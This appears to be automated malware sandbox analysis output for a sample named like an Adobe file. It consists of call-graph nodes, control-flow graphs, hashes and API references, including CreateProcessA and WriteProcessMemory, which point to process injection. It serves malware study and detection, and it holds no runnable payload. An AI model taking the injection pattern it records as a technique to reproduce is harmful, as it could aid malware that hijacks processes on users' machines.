51922->51925 51924->51924 51926 50ad01a 51925->51926 51927 50a7554 5 API calls 51926->51927 51928 50adccf 51927->51928 51932 50afa30 51928->51932 51938 50afa18 51928->51938 51929 50add09 51929->51924 51934 50afa61 51932->51934 51935 50afb61 51932->51935 51933 50afa6d 51933->51929 51934->51933 51943 5ca09c0 51934->51943 51948 5ca09b0 51934->51948 51935->51929 51939 50afa30 51938->51939 51940 50afa6d 51939->51940 51941 5ca09c0 CreateWindowExW 51939->51941 51942 5ca09b0 CreateWindowExW 51939->51942 51940->51929 51941->51940 51942->51940 51944 5ca09c6 51943->51944 51945 5ca0a9a 51944->51945 51953 5ca1c90 51944->51953 51957 5ca1ca0 51944->51957 51949 5ca09b3 51948->51949 51950 5ca0a9a 51949->51950 51951 5ca1c90 CreateWindowExW 51949->51951 51952 5ca1ca0 CreateWindowExW 51949->51952 51951->51950 51952->51950 51954 5ca1ca0 51953->51954 51960 5ca1150 51954->51960 51958 5ca1150 CreateWindowExW 51957->51958 51959 5ca1cd5 51958->51959 51959->51945 51961 5ca1cf0 CreateWindowExW 51960->51961 51963 5ca1e14 51961->51963 51976 5ca7d70 51977 5ca7d9d 51976->51977 51990 5ca77a4 51977->51990 51979 5ca7e91 51995 5ca77b4 51979->51995 51981 5ca7ec3 51982 5ca77a4 5 API calls 51981->51982 51983 5ca7fbd 51982->51983 51984 5ca77a4 5 API calls 51983->51984 51985 5ca7fef 51984->51985 51986 5ca77a4 5 API calls 51985->51986 51987 5ca8021 51986->51987 51988 5ca77b4 5 API calls 51987->51988 51989 5ca8053 51988->51989 51991 5ca77af 51990->51991 51992 5ca9ea3 51991->51992 51993 50a8b10 5 API calls 51991->51993 51994 50a7554 5 API calls 51991->51994 51992->51979 51993->51992 51994->51992 51996 5ca77bf 51995->51996 51997 5ca7b9c 5 API calls 51996->51997 51998 5caabff 51997->51998 51998->51981 51807 74686d8 51808 7468863 51807->51808 51810 74686fe 51807->51810 51810->51808 51811 7464afc 51810->51811 51812 7468958 PostMessageW 51811->51812 51813 74689c4 51812->51813 51813->51810

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 305 5fa30f8-5fa312a 307 5fa3658-5fa3676 305->307 308 5fa3130-5fa31c4 305->308 311 5fa3a71-5fa3a7d 307->311 333 5fa31d0-5fa3227 308->333 334 5fa31c6-5fa31ca 308->334 313 5fa3a83 311->313 314 5fa3684-5fa3690 311->314 315 5fa3a95-5fa3a9c 313->315 316 5fa3696-5fa3716 314->316 317 5fa3a85-5fa3a8a 314->317 335 5fa3718-5fa371e 316->335 336 5fa372e-5fa3747 316->336 317->315 360 5fa322d-5fa3235 333->360 361 5fa35a2-5fa35c6 333->361 334->333 337 5fa3722-5fa3724 335->337 338 5fa3720 335->338 342 5fa3749-5fa3772 336->342 343 5fa3777-5fa37b5 336->343 337->336 338->336 353 5fa3a6e 342->353 356 5fa37da-5fa37e7 343->356 357 5fa37b7-5fa37d8 343->357 353->311 367 5fa37ee-5fa37f4 356->367 357->367 363 5fa323c-5fa3244 360->363 364 5fa3237-5fa323b 360->364 370 5fa364a-5fa3655 361->370 368 5fa3249-5fa326b 363->368 369 5fa3246 363->369 364->363 371 5fa3813-5fa3865 367->371 372 5fa37f6-5fa3811 367->372 377 5fa326d 368->377 378 5fa3270-5fa3276 368->378 369->368 370->307 407 5fa386b-5fa3870 371->407 408 5fa3980-5fa39bf 371->408 372->371 377->378 380 5fa327c-5fa3296 378->380 381 5fa3525-5fa3530 378->381 382 5fa32db-5fa32e4 380->382 383 5fa3298-5fa329c 380->383 384 5fa3532 381->384 385 5fa3535-5fa356c 381->385 389 5fa32ea-5fa32fa 382->389 390 5fa3645 382->390 383->382 388 5fa329e-5fa32a9 383->388 384->385 419 5fa359a 385->419 420 5fa356e-5fa3598 385->420 391 5fa32af 388->391 392 5fa3337-5fa33e4 388->392 389->390 395 5fa3300-5fa3311 389->395 390->370 396 5fa32b2-5fa32b4 391->396 404 5fa33e6 392->404 405 5fa33f4-5fa34bc 392->405 395->390 397 5fa3317-5fa3327 395->397 398 5fa32ba-5fa32c5 396->398 399 5fa32b6 396->399 397->390 402 5fa332d-5fa3334 397->402 398->390 406 5fa32cb-5fa32d7 398->406 399->398 402->392 404->405 409 5fa33e8-5fa33ee 404->409 426 5fa35cb-5fa35dd 405->426 427 5fa34c2-5fa34c6 405->427 406->396 410 5fa32d9 406->410 413 5fa387a-5fa387d 407->413 429 5fa39db-5fa39ea 408->429 430 5fa39c1-5fa39d9 408->430 409->405 410->392 416 5fa3948-5fa3970 413->416 417 5fa3883 413->417 428 5fa3976-5fa397a 416->428 421 5fa388a-5fa38b6 417->421 422 5fa391a-5fa3946 417->422 423 5fa38bb-5fa38e7 417->423 424 5fa38ec-5fa3918 417->424 419->361 420->419 421->428 422->428 423->428 424->428 426->390 434 5fa35df-5fa35fc 426->434 427->426 435 5fa34cc-5fa34db 427->435 428->408 428->413 431 5fa39f3-5fa3a55 429->431 430->431 452 5fa3a60-5fa3a67 431->452 434->390 439 5fa35fe-5fa361a 434->439 440 5fa351b-5fa351f 435->440 441 5fa34dd 435->441 439->390 443 5fa361c-5fa363a 439->443 440->380 440->381 444 5fa34e3-5fa34e5 441->444 443->390 446 5fa363c 443->446 447 5fa34ef-5fa350b 444->447 448 5fa34e7-5fa34eb 444->448 446->390 447->390 451 5fa3511-5fa3519 447->451 448->447 451->440 451->444 452->353
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq$TJpq$Tekq$poq$xbnq
                                    • API String ID: 0-2301093937
                                    • Opcode ID: 4016f4259b36a1347b41359eed3e9cc80562fb46b0f07a7b4d79101cecc880bc
                                    • Instruction ID: 7294574f7dabe8e42ab5311aca1c50417eeaa41a119fcef3f00a4ce668e0beb5
                                    • Opcode Fuzzy Hash: 4016f4259b36a1347b41359eed3e9cc80562fb46b0f07a7b4d79101cecc880bc
                                    • Instruction Fuzzy Hash: 11623676A10218DFDB14DF68C984E69BBB2FF88304F1585A8E509AB3A5CB35EC51CF41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq
                                    • API String ID: 0-3255046985
                                    • Opcode ID: a5dcbee611c0c622112c20f2a1b29ab6c0221c7c94768e802f8e198c018ee5cb
                                    • Instruction ID: b81e53460f5ed52a8e1e5730f3b2c12c7798c5976874a5a4b03615cd38bed4cc
                                    • Opcode Fuzzy Hash: a5dcbee611c0c622112c20f2a1b29ab6c0221c7c94768e802f8e198c018ee5cb
                                    • Instruction Fuzzy Hash: BB511D71A216088FDB18EF7AEA4165ABFE3FBC8204F14D539E408DB268DF785905CB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 453 5fa4a3e-5fa4ad4 463 5fa4aec-5fa4b45 453->463 464 5fa4ad6-5fa4adc 453->464 472 5fa4b5d-5fa4c28 463->472 473 5fa4b47-5fa4b4d 463->473 465 5fa4ade 464->465 466 5fa4ae0-5fa4ae2 464->466 465->463 466->463 487 5fa4c2e-5fa4c9c 472->487 474 5fa4b4f 473->474 475 5fa4b51-5fa4b53 473->475 474->472 475->472
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 9af69c04eed5c628d633d3d651db4ccb6e25e0fa0522c1a7fbf137d3933ca9ed
                                    • Instruction ID: a96e8b1e1dd3c76324e5604fb190c6e44b71bfc47a1f80fcc446dfbfc8424ef1
                                    • Opcode Fuzzy Hash: 9af69c04eed5c628d633d3d651db4ccb6e25e0fa0522c1a7fbf137d3933ca9ed
                                    • Instruction Fuzzy Hash: E3518138B1020C8FD758AF64D955BAF7AA7FBC8704F248029E516DB798CE789C01CB51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1354 5fa0d58-5fa0d84 1356 5fa0d8a-5fa0de2 call 5fa0acc 1354->1356 1357 5fa0f9c-5fa10d2 1354->1357 1419 5fa0de4 call 5fa11a8 1356->1419 1420 5fa0de4 call 5fa119c 1356->1420 1372 5fa10db-5fa10e4 1357->1372 1373 5fa10d4-5fa10da 1357->1373 1375 5fa1116-5fa1133 1372->1375 1376 5fa10e6-5fa1142 1372->1376 1373->1372 1396 5fa1166-5fa1176 1375->1396 1384 5fa114f-5fa1153 1376->1384 1385 5fa1144-5fa1147 1376->1385 1377 5fa0dea-5fa0dee 1379 5fa0ea0-5fa0f26 1377->1379 1380 5fa0df4-5fa0e00 1377->1380 1414 5fa0f2d-5fa0f36 1379->1414 1380->1379 1391 5fa0e06-5fa0e15 1380->1391 1389 5fa1163 1384->1389 1390 5fa1155-5fa1159 1384->1390 1385->1384 1389->1396 1390->1389 1392 5fa115b 1390->1392 1400 5fa0e1d-5fa0e24 1391->1400 1392->1389 1397 5fa1178 1396->1397 1398 5fa117d-5fa1184 1396->1398 1397->1398 1404 5fa0e40-5fa0e9b 1400->1404 1405 5fa0e26-5fa0e38 1400->1405 1404->1414 1405->1404 1417 5fa0f38 1414->1417 1418 5fa0f40 1414->1418 1417->1418 1418->1357 1419->1377 1420->1377
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (oq$Hoq
                                    • API String ID: 0-3084834809
                                    • Opcode ID: 36ce2bfeb54653ebab305f85dfd74d40515898e09c3db6476846a54a04d94101
                                    • Instruction ID: 964406bbb8eec736cd1c2c9e4575dc5bf04ef64c3e4626ef30d6315a5d022c4f
                                    • Opcode Fuzzy Hash: 36ce2bfeb54653ebab305f85dfd74d40515898e09c3db6476846a54a04d94101
                                    • Instruction Fuzzy Hash: 06B19071E002089FDB14DFA8D4587AEBBB6FF88300F24852EE506AB394DF749945CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1581 5fa4828-5fa48e6 call 5fa4428 1594 5fa48e9-5fa4908 1581->1594 1596 5fa4910-5fa4914 1594->1596 1597 5fa4939-5fa493b 1596->1597 1598 5fa4916-5fa4931 1596->1598 1597->1594 1599 5fa493d-5fa49d8 1597->1599 1598->1597 1610 5fa49da-5fa49ef 1599->1610 1611 5fa49f8 1599->1611 1610->1611 1613 5fa49f9 1611->1613 1613->1613
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq$Tekq
                                    • API String ID: 0-2269808460
                                    • Opcode ID: e4ca911f474cd0c0203c28c4858ba9406d2fbb6fb40126ea374fec40b7ebb56a
                                    • Instruction ID: 521ed12fcb2c7d019b4d0e22c2a891e66a42e949634cae796c6ca377368b2b01
                                    • Opcode Fuzzy Hash: e4ca911f474cd0c0203c28c4858ba9406d2fbb6fb40126ea374fec40b7ebb56a
                                    • Instruction Fuzzy Hash: F54160B5B2120C8BD755BB68D5997AE7AA3EBC9308F104029EA15A77C8CE7C4C05C791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1614 5fa4838-5fa48e6 call 5fa4428 1627 5fa48e9-5fa4908 1614->1627 1629 5fa4910-5fa4914 1627->1629 1630 5fa4939-5fa493b 1629->1630 1631 5fa4916-5fa4931 1629->1631 1630->1627 1632 5fa493d-5fa49d8 1630->1632 1631->1630 1643 5fa49da-5fa49ef 1632->1643 1644 5fa49f8 1632->1644 1643->1644 1646 5fa49f9 1644->1646 1646->1646
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq$Tekq
                                    • API String ID: 0-2269808460
                                    • Opcode ID: 7c62186932f6af65a83d864cc16e7548eace009b6ffb52342d668064e077e7b4
                                    • Instruction ID: 3acc16865c5b931349a366ed066c7dfc73a29a5487e662eda47046d46f8821ec
                                    • Opcode Fuzzy Hash: 7c62186932f6af65a83d864cc16e7548eace009b6ffb52342d668064e077e7b4
                                    • Instruction Fuzzy Hash: FF4161B5B212088BD754BB68D5997AF7AA7EBC8704F104029FA06E73C8DE7C9C05C791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1647 74664ec-746658d 1650 74665c6-74665e6 1647->1650 1651 746658f-7466599 1647->1651 1658 746661f-746664e 1650->1658 1659 74665e8-74665f2 1650->1659 1651->1650 1652 746659b-746659d 1651->1652 1653 74665c0-74665c3 1652->1653 1654 746659f-74665a9 1652->1654 1653->1650 1656 74665ad-74665bc 1654->1656 1657 74665ab 1654->1657 1656->1656 1660 74665be 1656->1660 1657->1656 1665 7466687-7466741 CreateProcessA 1658->1665 1666 7466650-746665a 1658->1666 1659->1658 1661 74665f4-74665f6 1659->1661 1660->1653 1663 74665f8-7466602 1661->1663 1664 7466619-746661c 1661->1664 1667 7466606-7466615 1663->1667 1668 7466604 1663->1668 1664->1658 1679 7466743-7466749 1665->1679 1680 746674a-74667d0 1665->1680 1666->1665 1669 746665c-746665e 1666->1669 1667->1667 1670 7466617 1667->1670 1668->1667 1671 7466660-746666a 1669->1671 1672 7466681-7466684 1669->1672 1670->1664 1674 746666e-746667d 1671->1674 1675 746666c 1671->1675 1672->1665 1674->1674 1676 746667f 1674->1676 1675->1674 1676->1672 1679->1680 1690 74667d2-74667d6 1680->1690 1691 74667e0-74667e4 1680->1691 1690->1691 1694 74667d8 1690->1694 1692 74667e6-74667ea 1691->1692 1693 74667f4-74667f8 1691->1693 1692->1693 1695 74667ec 1692->1695 1696 74667fa-74667fe 1693->1696 1697 7466808-746680c 1693->1697 1694->1691 1695->1693 1696->1697 1698 7466800 1696->1698 1699 746681e-7466825 1697->1699 1700 746680e-7466814 1697->1700 1698->1697 1701 7466827-7466836 1699->1701 1702 746683c 1699->1702 1700->1699 1701->1702 1703 746683d 1702->1703 1703->1703
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746672E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: e24d93b09e18b5c9ec2ca082385a9a0ece9c08110ce0cb0d448ca1100a1cbd4e
                                    • Instruction ID: c4816696ffc8ba129f2debb4fb3e8c5cc13d93f3734018d96bb60a367dc1fa7a
                                    • Opcode Fuzzy Hash: e24d93b09e18b5c9ec2ca082385a9a0ece9c08110ce0cb0d448ca1100a1cbd4e
                                    • Instruction Fuzzy Hash: F2A18DB1D0021ADFDB10CF68C945BDEBBB2BF48314F1585AAE808A7244DB749985CF92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1705 74664f8-746658d 1707 74665c6-74665e6 1705->1707 1708 746658f-7466599 1705->1708 1715 746661f-746664e 1707->1715 1716 74665e8-74665f2 1707->1716 1708->1707 1709 746659b-746659d 1708->1709 1710 74665c0-74665c3 1709->1710 1711 746659f-74665a9 1709->1711 1710->1707 1713 74665ad-74665bc 1711->1713 1714 74665ab 1711->1714 1713->1713 1717 74665be 1713->1717 1714->1713 1722 7466687-7466741 CreateProcessA 1715->1722 1723 7466650-746665a 1715->1723 1716->1715 1718 74665f4-74665f6 1716->1718 1717->1710 1720 74665f8-7466602 1718->1720 1721 7466619-746661c 1718->1721 1724 7466606-7466615 1720->1724 1725 7466604 1720->1725 1721->1715 1736 7466743-7466749 1722->1736 1737 746674a-74667d0 1722->1737 1723->1722 1726 746665c-746665e 1723->1726 1724->1724 1727 7466617 1724->1727 1725->1724 1728 7466660-746666a 1726->1728 1729 7466681-7466684 1726->1729 1727->1721 1731 746666e-746667d 1728->1731 1732 746666c 1728->1732 1729->1722 1731->1731 1733 746667f 1731->1733 1732->1731 1733->1729 1736->1737 1747 74667d2-74667d6 1737->1747 1748 74667e0-74667e4 1737->1748 1747->1748 1751 74667d8 1747->1751 1749 74667e6-74667ea 1748->1749 1750 74667f4-74667f8 1748->1750 1749->1750 1752 74667ec 1749->1752 1753 74667fa-74667fe 1750->1753 1754 7466808-746680c 1750->1754 1751->1748 1752->1750 1753->1754 1755 7466800 1753->1755 1756 746681e-7466825 1754->1756 1757 746680e-7466814 1754->1757 1755->1754 1758 7466827-7466836 1756->1758 1759 746683c 1756->1759 1757->1756 1758->1759 1760 746683d 1759->1760 1760->1760
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746672E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: fefd69895b418fdcbfdbda67a2464fbab801198a180ee333e8cc7fe2057d244d
                                    • Instruction ID: d6b2058db57bc2747376d4c26c07a356e66770a02f1470b75799adf63467c024
                                    • Opcode Fuzzy Hash: fefd69895b418fdcbfdbda67a2464fbab801198a180ee333e8cc7fe2057d244d
                                    • Instruction Fuzzy Hash: EC916EB1D0021ADFDB10CF68C945BDEBBB2BF44314F1585AAE808A7254DB749985CF92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1762 50ab1b0-50ab1bf 1763 50ab1eb-50ab1ef 1762->1763 1764 50ab1c1-50ab1ce call 50aab54 1762->1764 1766 50ab203-50ab244 1763->1766 1767 50ab1f1-50ab1fb 1763->1767 1770 50ab1d0 1764->1770 1771 50ab1e4 1764->1771 1773 50ab251-50ab25f 1766->1773 1774 50ab246-50ab24e 1766->1774 1767->1766 1818 50ab1d6 call 50ab43a 1770->1818 1819 50ab1d6 call 50ab448 1770->1819 1771->1763 1775 50ab283-50ab285 1773->1775 1776 50ab261-50ab266 1773->1776 1774->1773 1781 50ab288-50ab28f 1775->1781 1778 50ab268-50ab26f call 50aab60 1776->1778 1779 50ab271 1776->1779 1777 50ab1dc-50ab1de 1777->1771 1780 50ab320-50ab3e0 1777->1780 1785 50ab273-50ab281 1778->1785 1779->1785 1813 50ab3e8-50ab413 GetModuleHandleW 1780->1813 1814 50ab3e2-50ab3e5 1780->1814 1783 50ab29c-50ab2a3 1781->1783 1784 50ab291-50ab299 1781->1784 1788 50ab2b0-50ab2b9 call 50aab70 1783->1788 1789 50ab2a5-50ab2ad 1783->1789 1784->1783 1785->1781 1793 50ab2bb-50ab2c3 1788->1793 1794 50ab2c6-50ab2cb 1788->1794 1789->1788 1793->1794 1795 50ab2e9-50ab2f6 1794->1795 1796 50ab2cd-50ab2d4 1794->1796 1803 50ab2f8-50ab316 1795->1803 1804 50ab319-50ab31f 1795->1804 1796->1795 1798 50ab2d6-50ab2e6 call 50aab80 call 50aab90 1796->1798 1798->1795 1803->1804 1815 50ab41c-50ab430 1813->1815 1816 50ab415-50ab41b 1813->1816 1814->1813 1816->1815 1818->1777 1819->1777
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 44633d1e9c001f33d6b6998fdb726bc0058df83712e58e1bc930156c116df3b3
                                    • Instruction ID: dd2e0606472f865974305e0882eeca670e1c2595f4a77842f01a421943e51bde
                                    • Opcode Fuzzy Hash: 44633d1e9c001f33d6b6998fdb726bc0058df83712e58e1bc930156c116df3b3
                                    • Instruction Fuzzy Hash: 9F712571A00B058FD764DFA9E54579EBBF2FF88304F008A2AD44AD7A50EB74E845CB94
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: a24ed702491a0cc13317ff61a08fe730b0cb33c523e3f0d41d60b608c6146b99
                                    • Instruction ID: 648a1891f844c2c7e374ed67a475767bb56d10d67d64a476bc3bb8670c986dc2
                                    • Opcode Fuzzy Hash: a24ed702491a0cc13317ff61a08fe730b0cb33c523e3f0d41d60b608c6146b99
                                    • Instruction Fuzzy Hash: 5C5145B2C043599FDB11DFA9C984ACEBFB1FF48304F24852AE418AB221D7749984CF94
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: bcca549c2a2c4d24f712226eb4e0834cca92cbbeb51efb367a59f2e3766f18d1
                                    • Instruction ID: 62deec55af7f07f00be34bcbf51d597a0bdc70c70212c565e089a8b3459d8893
                                    • Opcode Fuzzy Hash: bcca549c2a2c4d24f712226eb4e0834cca92cbbeb51efb367a59f2e3766f18d1
                                    • Instruction Fuzzy Hash: BB51C0B1D003499FDB14CF9AC984ADEBFB6BF48314F24852AE819AB210D7759985CF90
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 47263370fd311838d3948cab78fba7fa26aca7a0542e29cdc390736f93dbe940
                                    • Instruction ID: 6ae8244465a660ee6e7b51dc1b5e44c52f7acda8ee56a44fc0737e03656e5b6f
                                    • Opcode Fuzzy Hash: 47263370fd311838d3948cab78fba7fa26aca7a0542e29cdc390736f93dbe940
                                    • Instruction Fuzzy Hash: 5151CEB1D002099FDB14CF99C984ADEBFB6BF48314F24852AE819AB210D7759985CF90
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 050A59C9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 9a575db47a93ac8ca7e1dc703a7be34f63b1539e82a46804892a4ed11ddf7d15
                                    • Instruction ID: 7aab67ec6591f843023d58ace027d88fd01214ba4e06ace57a354d6a63e4d17e
                                    • Opcode Fuzzy Hash: 9a575db47a93ac8ca7e1dc703a7be34f63b1539e82a46804892a4ed11ddf7d15
                                    • Instruction Fuzzy Hash: A541E2B1C00619CADB24CFA9C884BCDBBF6BF49704F24805AD408AB255DB756985CF90
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05CA4371
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: e3829e30a1798acc160bf5be2dd72c197ec099bf7e991701d8763d11e1d60443
                                    • Instruction ID: 5d0d86e9c7ca2ea73c6b43e559d840e233c6c6326b9c2155378d6b821cf13ef3
                                    • Opcode Fuzzy Hash: e3829e30a1798acc160bf5be2dd72c197ec099bf7e991701d8763d11e1d60443
                                    • Instruction Fuzzy Hash: 664109B5900205CFDB14CF99C488AAEBBF6FF88314F25D859D519AB321D774A941CFA0
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 050A59C9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: d7fad2f15f4af70c43c3227d302281cc3cb27076dc606adb16d43af9aaffeecf
                                    • Instruction ID: d55fc7ffa1867b66aa7f795a612c16c6880ed751b09da544add1bead7ed8460a
                                    • Opcode Fuzzy Hash: d7fad2f15f4af70c43c3227d302281cc3cb27076dc606adb16d43af9aaffeecf
                                    • Instruction Fuzzy Hash: 8041FFB1D00719CBDB24CFA9C884BCEBBF5BF49304F24806AD408AB255DBB56985CF90
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466300
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: a3d0fae01c88a4f3a909d96f9f701ad591d428833e6a917ec62b2ced0b2e9638
                                    • Instruction ID: 46abc60b29ec42763188b3d236f0f5fb98448e2a3eee4d41987a52179afbb176
                                    • Opcode Fuzzy Hash: a3d0fae01c88a4f3a909d96f9f701ad591d428833e6a917ec62b2ced0b2e9638
                                    • Instruction Fuzzy Hash: A82168B59003499FCB10CFA9C885BDEBBF5FF48310F10882AE958A7240C7749584CBA1
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F550D7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: b8ff940f717e415c226e83dec0d5ca7daf9363893dc1c71bb500a72282b50106
                                    • Instruction ID: 4e49c64b0cd989276eec44aab49788825e1c93b68f59e9a67eecbcc22a6f619d
                                    • Opcode Fuzzy Hash: b8ff940f717e415c226e83dec0d5ca7daf9363893dc1c71bb500a72282b50106
                                    • Instruction Fuzzy Hash: 8031C2B5D002099FDB10CF9AD884ADEFBF5FF48320F14842AE919A7210D775A945CFA0
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466300
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 9f988b71f942b72d897aface06660a861073fca9a156a999a17698cf946d7197
                                    • Instruction ID: a0994736706cecacb178a492157738a8d9e2e29c7ebd1cd6a336811a68e887e3
                                    • Opcode Fuzzy Hash: 9f988b71f942b72d897aface06660a861073fca9a156a999a17698cf946d7197
                                    • Instruction Fuzzy Hash: 352157B1900359DFCB10CFA9C885BDEBBF5FF48310F10882AE958A7250C7789944CBA1
